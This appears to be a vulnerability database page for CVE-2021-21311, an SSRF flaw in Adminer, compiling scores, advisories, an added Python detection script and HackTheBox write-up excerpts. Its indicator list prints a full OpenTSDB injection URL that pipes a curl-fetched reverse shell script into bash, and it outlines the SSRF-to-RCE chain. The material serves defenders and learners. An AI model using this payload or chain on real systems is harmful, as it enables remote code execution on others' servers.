CVE-2021-21311
Published 2021-02-11
Priority P185 · high · CVSS 3.1 base score 7.2
CVSS 3.1 vector: AV:N / AC:L / PR:N / UI:N / S:C / C:L / I:L / A:N
Tags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, remediation due 2025-10-20
Exploited in the wild
EPSS: 90.46% (99.8th percentile)
Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9.
Affected
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adminer | adminer | >= 0 < 4.7.9-1 | 4.7.9-1 |
| adminer | adminer | >= 0 < 4.2.1-1ubuntu1+esm1 | 4.2.1-1ubuntu1+esm1 |
| adminer | adminer | >= 0 < 4.6.2-1ubuntu0.1~esm1 | 4.6.2-1ubuntu0.1~esm1 |
| adminer | adminer | >= 0 < 4.7.6-1ubuntu0.1~esm1 | 4.7.6-1ubuntu0.1~esm1 |
| adminer | adminer | >= 4.0.0 < 4.7.9 | 4.7.9 |
| debian | adminer | < 4.7.9-1 (bookworm) | 4.7.9-1 (bookworm) |
| debian | debian_linux | — | — |
| vrana | adminer | — | — |
| vrana | adminer | >= 0 < 4.7.9 | 4.7.9 |
Detection & IOCs (extracted from sources)
- URL (the OpenTSDB command-injection payload used in the AdmirerToo chain): http://localhost:4242/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=[33:system('curl${IFS}http://10.10.14.14:8000/rev.sh|bash')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
- The SSRF exploit works by triggering a 301 redirect from an attacker-controlled HTTP server; monitor for outbound HTTP requests from the Adminer server to attacker-controlled IPs, particularly with Authorization: Basic headers.
- The SSRF is triggered via the `server` POST parameter in Adminer login requests; detect POST requests to Adminer with non-localhost or external values in the `auth[server]` field.
- Exploitation chains the Adminer SSRF (CVE-2021-21311) with OpenTSDB RCE (CVE-2020-35476) via the `yrange` parameter containing a `system()` call; detect HTTP requests to the OpenTSDB `/q` endpoint with `yrange` containing shell metacharacters.
- Adminer SSRF affects versions 4.0.0 through 4.7.8 (all-drivers bundle adminer.php); detect Adminer versions below 4.7.9 via HTTP response headers or page content.
- The SSRF allows unauthenticated attackers to redirect Adminer to internal services; monitor for Adminer processes making connections to internal/RFC1918 addresses or link-local addresses (e.g. 169.254.169.254).
- Only Adminer installations using the all-drivers bundle (adminer.php) are vulnerable; single-driver builds are not affected.
- The exploit PoC (ssrf.py) requires the attacker to run a listener HTTP server that issues a 301 redirect to the internal target; the attacker host must be reachable from the Adminer server.
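The indicators above, turned into runnable checks. This is an added example written for this page, not code from Adminer, the Nuclei template or any source quoted here. It covers the `auth[server]` login check, the egress check for RFC1918/link-local destinations (including 169.254.169.254), the OpenTSDB `yrange` check for the chained CVE-2020-35476 step, and a version-range fingerprint. The proxy log line layout, the egress record shape and the `<span class="version">` marker used for fingerprinting are assumptions; the sample log lines and connection records are constructed, and the only real input is the OpenTSDB payload URL listed above.

```python
"""Detection helpers for the CVE-2021-21311 indicators listed above.

Added example for this page (not Adminer, Nuclei or source code). Assumed:
proxy log shape "<ts> <client> <method> <path> [<body>]", egress records as
(process, dst, port), and a <span class="version"> marker in Adminer's HTML.
All sample data is constructed.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

FIRST_AFFECTED, FIXED = (4, 0, 0), (4, 7, 9)
CLOUD_METADATA = ipaddress.ip_address("169.254.169.254")
LOOPBACK = [ipaddress.ip_network(n) for n in ("127.0.0.0/8", "::1/128")]
# Explicit ranges instead of ipaddress's is_private, which also counts the
# documentation nets (198.51.100.0/24 etc.) as private and would hide them.
INTERNAL = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",  # RFC1918
    "169.254.0.0/16", "fe80::/10", "fc00::/7")]       # link-local, IPv6 ULA

def classify_host(value, allowlist=()):
    """Classify a host or host:port taken from auth[server] or an egress record."""
    host = urlsplit("//" + value).hostname or value  # drops :port and IPv6 [ ]
    if host in allowlist:
        return "allowlisted"
    if host == "localhost":
        return "loopback"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "hostname"  # resolve before judging: a name can point anywhere
    if addr == CLOUD_METADATA:
        return "cloud-metadata"
    if any(addr in net for net in LOOPBACK):
        return "loopback"
    if any(addr in net for net in INTERNAL):
        return "internal"
    return "external"

LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<path>\S+)(?: (?P<body>.*))?$")

def suspicious_logins(lines, allowlist=()):
    """Adminer login POSTs whose auth[server] is not a loopback/allowlisted DB host."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or "adminer" not in m["path"].lower():
            continue
        for server in parse_qs(m["body"] or "").get("auth[server]", []):
            verdict = classify_host(server, allowlist)
            if verdict not in ("loopback", "allowlisted"):
                hits.append((m["src"], server, verdict))
    return hits

def suspicious_egress(records, allowlist=()):
    """Connections from the Adminer host that are neither loopback nor
    allowlisted: this is where the attacker's 301 sends Adminer."""
    hits = []
    for proc, dst, port in records:
        verdict = classify_host(dst, allowlist)
        if verdict not in ("loopback", "allowlisted"):
            hits.append((proc, dst, port, verdict))
    return hits

SHELL_META = re.compile(r"[;&|`$(){}]")

def suspicious_opentsdb_query(url):
    """OpenTSDB /q request whose yrange carries shell metacharacters."""
    u = urlsplit(url)
    if not u.path.endswith("/q"):
        return False
    return any(SHELL_META.search(v) for v in parse_qs(u.query).get("yrange", []))

VERSION_RE = re.compile(r'<span class="version">\s*(\d+(?:\.\d+)*)')

def version_status(html):
    """'affected' for 4.0.0 <= version < 4.7.9; None if no version marker found."""
    m = VERSION_RE.search(html)
    if not m:
        return None
    v = tuple(int(p) for p in m.group(1).split("."))  # tuple compare: 4.7.10 > 4.7.9
    return "affected" if FIRST_AFFECTED <= v < FIXED else "not-affected"

SAMPLE_LOGINS = [  # constructed
    "2025-10-01T09:00:00Z 192.168.1.20 POST /adminer.php auth[server]=localhost&auth[username]=app&auth[password]=x",
    "2025-10-01T09:00:05Z 198.51.100.8 POST /adminer.php auth[server]=198.51.100.8:8000&auth[username]=a&auth[password]=b",
    "2025-10-01T09:00:07Z 198.51.100.8 POST /adminer.php auth[server]=169.254.169.254&auth[username]=a&auth[password]=b",
    "2025-10-01T09:01:00Z 192.168.1.20 GET /adminer.php?username=app",
]
SAMPLE_EGRESS = [  # constructed: (process, destination, port)
    ("php-fpm", "127.0.0.1", 3306), ("php-fpm", "198.51.100.8", 8000),
    ("php-fpm", "10.0.0.12", 4242), ("php-fpm", "169.254.169.254", 80),
]

if __name__ == "__main__":
    for hit in suspicious_logins(SAMPLE_LOGINS):
        print("login:", hit)
    for hit in suspicious_egress(SAMPLE_EGRESS, allowlist=("10.0.0.12",)):
        print("egress:", hit)
    print("version:", version_status('<span class="version">4.7.8</span>'))
```

Pass the deployment's legitimate database hosts as `allowlist` so routine logins and connections are not reported; a `hostname` verdict means the value must be resolved (at the time of the request, since DNS rebinding is possible) before deciding. The version check compares integer tuples rather than strings, so 4.7.10 is correctly treated as newer than the 4.7.9 fix.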
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 7.2 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N |
| nvd | 2.0 | 6.4 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:P/A:N |
| osv | | 7.2 | HIGH | |
| vulncheck | | 7.2 | HIGH | |
| cisa | | 7.2 | HIGH | |
| vendor_debian | | 7.2 | HIGH | |
| vendor_ubuntu | | 6.1 | MEDIUM | |
OSV
adminer vulnerabilities (Ubuntu advisory text)
osv · 2022-06-03 · CVSS 6.1 · CVE-2020-35572 [MEDIUM]
It was discovered that Adminer did not escape data in the history parameter
of the default URI. A remote attacker could possibly use this issue to perform
cross-site scripting (XSS) attacks. This issue only affected Ubuntu 20.04 ESM.
(CVE-2020-35572)
Adam Crosser and Brian Sizemore discovered that Adminer incorrectly handled
redirection requests to internal servers. An unauthenticated remote attacker
could possibly use this to perform a server-side request forgery attack and
expose sensitive information. (CVE-2021-21311)
It was discovered that Adminer was incorrectly escaping data in the doc_link
function. A remote attacker could possibly use this issue to perform cross-site
scripting (XSS) attacks. This issue only affected Ubuntu 18.04 ESM and
Ubuntu 20.04 ESM.
OSV
SSRF in adminer
osv · 2021-02-11 · CVE-2021-21311 [HIGH]
### Impact
Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected.
### Patches
Patched by ccd2374b, included in version [4.7.9](https://github.com/vrana/adminer/releases/tag/v4.7.9).
### Workarounds
* Use a single driver version (e.g. `adminer-mysql.php`).
* Protect access to Adminer also by other means, e.g. by HTTP password, IP address limiting or by OTP [plugin](https://www.adminer.org/plugins/).
### References
https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
### For more information
If you have any questions or comments about this advisory:
* Comment at ccd2374b.
GHSA
SSRF in adminer
ghsa · 2021-02-11 · CVE-2021-21311 [HIGH] · CWE-918 · GHSA-x5r2-hj5c-8jx6
(Advisory text identical to the OSV "SSRF in adminer" entry above.)
OSV
CVE-2021-21311: Adminer is an open-source database management in a single PHP file
osv · 2021-02-11 · CVSS 7.2 · CVE-2021-21311 [HIGH]
(Description identical to the NVD text at the top of the page.)
VulnCheck
Adminer Server-Side Request Forgery Vulnerability
vulncheck · 2021 · CVSS 7.2 · CVE-2021-21311 [HIGH] · CWE-918
Adminer contains a server-side request forgery vulnerability that, when exploited, allows a remote attacker to obtain potentially sensitive information.
Affected: Adminer (vendor) / Adminer (product)
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://cloud.google.com/blog/topics/threat-intelligence/cloud-metadata-abuse-unc2903; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.recordedfuture.com/blog/september-2025-cve-landscape; https://www.rapid7.com/cdn/assets/bltbd2f1cd70f9e3e7f/691360b9c91291146f1a5308/threat-landscape-report-q3-2025.pdf; https
CISA
Adminer Server-Side Request Forgery Vulnerability
cisa · 2025-09-29 · CVSS 7.2 · CVE-2021-21311 [HIGH] · CWE-918
Affected: Adminer (vendor) / Adminer (product)
Adminer contains a server-side request forgery vulnerability that, when exploited, allows a remote attacker to obtain potentially sensitive information.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6 ; https://nvd.nist.gov/vuln/detail/CVE-2021-21311
Remediation Due Date: 2025-10-20
Ubuntu
Adminer vulnerabilities
vendor_ubuntu · 2022-06-03 · CVSS 6.1 · CVE-2021-21311 [MEDIUM]
Summary: Several security issues were fixed in Adminer. (The advisory text is the same Ubuntu notice quoted in the OSV "adminer vulnerabilities" entry above.)
Debian
CVE-2021-21311: adminer
vendor_debian · 2021 · CVSS 7.2 · CVE-2021-21311 [HIGH]
(Description identical to the NVD text at the top of the page.)
Scope: local
bookworm: resolved (fixed in 4.7.9-1)
bullseye: resolved (fixed in 4.7.9-1)
forky: resolved (fixed in 4.7.9-1)
sid: resolved (fixed in 4.7.9-1)
trixie: resolved (fixed in 4.7.9-1)
No detection rules found.
Nuclei
Adminer <4.7.9 - Server-Side Request Forgery
nuclei · CVSS 7.2 · CVE-2021-21311 [HIGH]
Only the tail of the template's matchers section survives in this excerpt:
```yaml
# excerpt begins mid-template; the first line is cut off
Adminer 400 - Bad Request"
        - " 400 - Bad Request "
      condition: or
    - type: status
      status:
        - 403
# digest: 4a0a00473045022100e16cd237e6f0e2672326dd70078f7338476b1de74253328c75f37bdbb46592f50220751001d87c79ab6fd5d4180c5f9f07425915bc3660a8b189b292de7bf41ddf0f:922c64590222798bb761d5b6d8e72950
```
Tenable
Identifying Server Side Request Forgery: How Tenable.io Web Application Scanning Can Help
blogs_tenable · 2021-11-18
Recorded Future
September 2025 CVE Landscape
blogs_recorded_future · CVSS 7.2 · [HIGH]
# September 2025 CVE Landscape
In September 2025, Recorded Future’s Insikt Group® identified sixteen high-impact vulnerabilities that should be prioritized for remediation. This represents a decrease from the eighteen identified in August, with the number of Very Critical vulnerabilities also decreasing (11) month over month.
These vulnerabilities have affected the following vendors: Sudo, Libraesva, Fortra, Cisco, Adminer, Google, Dassault Systèmes, Linux, Android, Sitecore, TP-Link, and Meta Platforms.
September was dominated by flaws in Cisco and TP-Link, which together represented six of the sixteen vulnerabilities. Cisco’s IOS, IOS XE, and Secure Firewall products were affected by flaws, including stack-based and classic buffer overflows (CWE-121, CWE-120) and missing authorization
CTF
medium / README
ctf_writeups · CVSS 9.1 · [CRITICAL]
# HackTheBox - Medium Machines
> Comprehensive index of retired HTB Medium-difficulty machines with key techniques and attack path summaries.
**Total: 100+ machines** | Sorted roughly by retirement date (newest first)
---
## Machine Index
| # | Machine | OS | Key Techniques | Attack Path Summary | Writeup |
|---|---------|-----|----------------|---------------------|---------|
| 1 | Signed | Linux | Code Signing Bypass, Certificate Abuse | Forge code signature to deploy malicious update, escalate via trusted binary execution | [0xdf](https://0xdf.gitlab.io/2026/02/07/htb-signed.html) |
| 2 | Voleur | Linux | Data E
CTF
AdmirerToo / README
ctf_writeups · CVSS 9.8 · CVE-2021-21311 [CRITICAL]
# AdmirerToo - HackTheBox - Writeup
Linux, 40 Base Points, Hard
## Machine
## TL;DR
To solve this machine, we begin by enumerating open services using `nmap`, finding ports `22` and `80`.
***User***: By reading the HTML source of `403` pages we found vhost `admirer-gallery.htb`, found `Adminer` on `db.admirer-gallery.htb`, and found the Adminer SSRF (`CVE-2021-21311`). Using the SSRF we access internal port `4242` and find that it is `openTSDB`. Using `CVE-2020-35476` we get RCE and a reverse shell as the `opentsdb` user. Enumerating, we found `/var/www/adminer/plugins/data/servers.php`, which contains the password of the `jennifer` user.
***Root***: Found `fail2ban` and `openCATS` running on the target machine on port `8080`,
References
- https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351
- https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
- https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
- https://lists.debian.org/debian-lts-announce/2021/03/msg00002.html
- https://packagist.org/packages/vrana/adminer
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-21311
Timeline
- 2021-02-11: Published
- 2025-09-29: Added to CISA KEV
- Exploited in the wild